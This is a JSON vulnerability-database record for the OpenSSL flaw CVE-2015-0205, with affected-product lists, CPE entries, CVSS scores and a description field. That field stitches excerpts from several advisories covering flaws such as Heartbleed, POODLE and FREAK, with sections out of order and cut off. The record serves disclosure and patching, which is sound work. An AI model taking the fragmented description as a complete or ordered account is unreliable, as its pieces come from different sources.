{ "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "power systems 350.d0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1886" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087520" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.40" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.2" }, { "model": "vds service broker", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "74.90" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "d9036 modular encoding platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35001.1" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2.0.5" }, { "model": "video surveillance 4300e/4500e high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.40" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3950x638370" }, { "model": "flex system p260 compute node /fc efd9", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.2" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "power", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5950" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "junos os 12.3x48-d10", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8677" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.2" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.5" }, { "model": "one-x client enablement services sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "video surveillance ptz ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "anyconnect secure mobility client for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "004.000(1233)" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.2.835" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.2.10" }, { "model": "telepresence serial gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.841" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.3" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.1.0.7" }, { "model": "ctpos 6.6r5", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "webex meetings server 2.5mr2", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "junos os 13.2r8", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "wireless lan controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.103" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.3" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "780.01" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.9" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.52" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "unified attendant console enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "550" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "netscaler service delivery appliance", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "matrix operating environment", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.1" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.22" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5504965" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.2.7" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "87104.1" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "53000" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.0.121" }, { "model": "ios 15.5 s", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.2" }, { "model": "prime performance manager for sps ppm sp1", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.6" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1.0.7" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "session border controller for enterprise", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.7.770" }, { "model": "insight orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.70" }, { "model": "telepresence isdn gw mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83210" }, { "model": "ucs central", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.1.0.6" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.1" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.31" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x44079170" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.1" }, { "model": "unified communications domain manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.1.2" }, { "model": "flex system p460 compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-43x)0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "systems insight manager 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2.0.8" }, { "model": "dx360 m4 water cooled type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79190" }, { "model": "im and presence service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4.750" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.3.0.5" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.1" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system m5 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x325054580" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2.0.8" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.00" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "tivoli provisioning manager for images system edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.800" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)5.1" }, { "model": "cloud object store", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.9.790" } ], "sources": [ { "db": "BID", "id": "71941" }, { "db": "JVNDB", "id": "JVNDB-2015-001010" }, { "db": "NVD", "id": "CVE-2015-0205" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2015-0205" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "HP", "sources": [ { "db": "PACKETSTORM", "id": "133316" }, { "db": "PACKETSTORM", "id": "137292" }, { "db": "PACKETSTORM", "id": "132763" }, { "db": "PACKETSTORM", "id": "137201" } ], "trust": 0.4 }, "cve": "CVE-2015-0205", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "None", "baseScore": 5.0, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2015-0205", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2015-0205", "trust": 1.8, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2015-0205", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-0205" }, { "db": "JVNDB", "id": "JVNDB-2015-001010" }, { "db": "NVD", "id": "CVE-2015-0205" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The ssl3_get_cert_verify function in s3_srvr.c in OpenSSL 1.0.0 before 1.0.0p and 1.0.1 before 1.0.1k accepts client authentication with a Diffie-Hellman (DH) certificate without requiring a CertificateVerify message, which allows remote attackers to obtain access without knowledge of a private key via crafted TLS Handshake Protocol traffic to a server that recognizes a Certification Authority with DH support. OpenSSL is prone to security-bypass vulnerability. \nSuccessfully exploiting these issues may allow attackers to perform unauthorized actions by conducting a man-in-the-middle attack. This may lead to other attacks. \nCorrected: 2015-01-09 00:58:20 UTC (stable/10, 10.1-STABLE)\n 2015-01-14 21:27:46 UTC (releng/10.1, 10.1-RELEASE-p4)\n 2015-01-14 21:27:46 UTC (releng/10.0, 10.0-RELEASE-p16)\n 2015-01-09 01:11:43 UTC (stable/9, 9.3-STABLE)\n 2015-01-14 21:27:46 UTC (releng/9.3, 9.3-RELEASE-p8)\n 2015-01-09 01:11:43 UTC (stable/8, 8.4-STABLE)\n 2015-01-14 21:27:46 UTC (releng/8.4, 8.4-RELEASE-p22)\nCVE Name: CVE-2014-3571, CVE-2015-0206, CVE-2014-3569, CVE-2014-3572\n CVE-2015-0204, CVE-2015-0205, CVE-2014-8275, CVE-2014-3570\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:https://security.FreeBSD.org/\u003e. Background\n\nFreeBSD includes software from the OpenSSL Project. \n\nII. [CVE-2014-3569] This does not affect\nFreeBSD\u0027s default build. [CVE-2015-0205]\n\nOpenSSL accepts several non-DER-variations of certificate signature\nalgorithm and signature encodings. OpenSSL also does not enforce a\nmatch between the signature algorithm between the signed and unsigned\nportions of the certificate. [CVE-2014-3570]\n\nIII. [CVE-2015-0206]\n\nA server can remove forward secrecy from the ciphersuite. [CVE-2014-3572]\n\nA server could present a weak temporary key and downgrade the security of\nthe session. This only\naffects servers which trust a client certificate authority which issues\ncertificates containing DH keys, which is extremely rare. [CVE-2015-0205]\n\nBy modifying the contents of the signature algorithm or the encoding of\nthe signature, it is possible to change the certificate\u0027s fingerprint. It also does not affect common revocation mechanisms. Only\ncustom applications that rely on the uniqueness of the fingerprint\n(e.g. certificate blacklists) may be affected. [CVE-2014-8275]\n\nIV. Workaround\n\nNo workaround is available. \n\nV. Solution\n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to a supported FreeBSD stable or\nrelease / security branch (releng) dated after the correction date. \n\n2) To update your vulnerable system via a binary patch:\n\nSystems running a RELEASE version of FreeBSD on the i386 or amd64\nplatforms can be updated via the freebsd-update(8) utility:\n\n# freebsd-update fetch\n# freebsd-update install\n\n3) To update your vulnerable system via a source code patch:\n\nThe following patches have been verified to apply to the applicable\nFreeBSD release branches. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n[FreeBSD 8.4 and FreeBSD 9.3]\n# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-9.3.patch\n# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-9.3.patch.asc\n# gpg --verify openssl-9.3.patch.asc\n\n[FreeBSD 10.0]\n# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.0.patch\n# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.0.patch.asc\n# gpg --verify openssl-10.0.patch.asc\n\n[FreeBSD 10.1]\n# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.1.patch\n# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.1.patch.asc\n# gpg --verify openssl-10.1.patch.asc\n\nb) Apply the patch. Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n\nc) Recompile the operating system using buildworld and installworld as\ndescribed in \u003cURL:https://www.FreeBSD.org/handbook/makeworld.html\u003e. \n\nRestart all deamons using the library, or reboot the system. \n\nVI. Correction details\n\nThe following list contains the correction revision numbers for each\naffected branch. \n\nBranch/path Revision\n- -------------------------------------------------------------------------\nstable/8/ r276865\nreleng/8.4/ r277195\nstable/9/ r276865\nreleng/9.3/ r277195\nstable/10/ r276864\nreleng/10.0/ r277195\nreleng/10.1/ r277195\n- -------------------------------------------------------------------------\n\nTo see which files were modified by a particular revision, run the\nfollowing command, replacing NNNNNN with the revision number, on a\nmachine with Subversion installed:\n\n# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base\n\nOr visit the following URL, replacing NNNNNN with the revision number:\n\n\u003cURL:https://svnweb.freebsd.org/base?view=revision\u0026revision=NNNNNN\u003e\n\nVII. \n \n The Montgomery ladder implementation in OpenSSL through 1.0.0l does\n not ensure that certain swap operations have a constant-time behavior,\n which makes it easier for local users to obtain ECDSA nonces via a\n FLUSH+RELOAD cache side-channel attack (CVE-2014-0076). \n \n The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before\n 1.0.1g do not properly handle Heartbeat Extension packets, which allows\n remote attackers to obtain sensitive information from process memory\n via crafted packets that trigger a buffer over-read, as demonstrated\n by reading private keys, related to d1_both.c and t1_lib.c, aka the\n Heartbleed bug (CVE-2014-0160). \n \n The dtls1_reassemble_fragment function in d1_both.c in OpenSSL\n before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does\n not properly validate fragment lengths in DTLS ClientHello messages,\n which allows remote attackers to execute arbitrary code or cause a\n denial of service (buffer overflow and application crash) via a long\n non-initial fragment (CVE-2014-0195). \n \n The do_ssl3_write function in s3_pkt.c in OpenSSL 1.x through 1.0.1g,\n when SSL_MODE_RELEASE_BUFFERS is enabled, does not properly manage a\n buffer pointer during certain recursive calls, which allows remote\n attackers to cause a denial of service (NULL pointer dereference\n and application crash) via vectors that trigger an alert condition\n (CVE-2014-0198). \n \n The ssl3_send_client_key_exchange function in s3_clnt.c in OpenSSL\n before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h, when\n an anonymous ECDH cipher suite is used, allows remote attackers to\n cause a denial of service (NULL pointer dereference and client crash)\n by triggering a NULL certificate value (CVE-2014-3470). \n \n The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other\n products, uses nondeterministic CBC padding, which makes it easier\n for man-in-the-middle attackers to obtain cleartext data via a\n padding-oracle attack, aka the POODLE issue (CVE-2014-3566). \n \n The ssl23_get_client_hello function in s23_srvr.c in OpenSSL\n 0.9.8zc, 1.0.0o, and 1.0.1j does not properly handle attempts to\n use unsupported protocols, which allows remote attackers to cause a\n denial of service (NULL pointer dereference and daemon crash) via\n an unexpected handshake, as demonstrated by an SSLv3 handshake to\n a no-ssl3 application with certain error handling. NOTE: this issue\n became relevant after the CVE-2014-3568 fix (CVE-2014-3569). \n \n The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before\n 1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square\n of a BIGNUM value, which might make it easier for remote attackers to\n defeat cryptographic protection mechanisms via unspecified vectors,\n related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and\n crypto/bn/bn_asm.c (CVE-2014-3570). \n \n The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before\n 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote\n SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger\n a loss of forward secrecy by omitting the ServerKeyExchange message\n (CVE-2014-3572). \n \n OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k\n does not enforce certain constraints on certificate data, which allows\n remote attackers to defeat a fingerprint-based certificate-blacklist\n protection mechanism by including crafted data within a\n certificate\u0026#039;s unsigned portion, related to crypto/asn1/a_verify.c,\n crypto/dsa/dsa_asn1.c, crypto/ecdsa/ecs_vrf.c, and crypto/x509/x_all.c\n (CVE-2014-8275). \n \n The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before\n 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL\n servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate\n brute-force decryption by offering a weak ephemeral RSA key in a\n noncompliant role, related to the FREAK issue. NOTE: the scope of\n this CVE is only client code based on OpenSSL, not EXPORT_RSA issues\n associated with servers or other TLS implementations (CVE-2015-0204). \n \n Use-after-free vulnerability in the d2i_ECPrivateKey function in\n crypto/ec/ec_asn1.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r,\n 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a might allow remote\n attackers to cause a denial of service (memory corruption and\n application crash) or possibly have unspecified other impact via a\n malformed Elliptic Curve (EC) private-key file that is improperly\n handled during import (CVE-2015-0209). \n \n The ASN1_item_ex_d2i function in crypto/asn1/tasn_dec.c in OpenSSL\n before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2\n before 1.0.2a does not reinitialize CHOICE and ADB data structures,\n which might allow attackers to cause a denial of service (invalid\n write operation and memory corruption) by leveraging an application\n that relies on ASN.1 structure reuse (CVE-2015-0287). \n \n The PKCS#7 implementation in OpenSSL before 0.9.8zf, 1.0.0 before\n 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not\n properly handle a lack of outer ContentInfo, which allows attackers to\n cause a denial of service (NULL pointer dereference and application\n crash) by leveraging an application that processes arbitrary PKCS#7\n data and providing malformed data with ASN.1 encoding, related to\n crypto/pkcs7/pk7_doit.c and crypto/pkcs7/pk7_lib.c (CVE-2015-0289). \n \n The updated packages have been upgraded to the 1.0.1m version where\n these security flaws has been fixed. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0076\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0195\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221\n 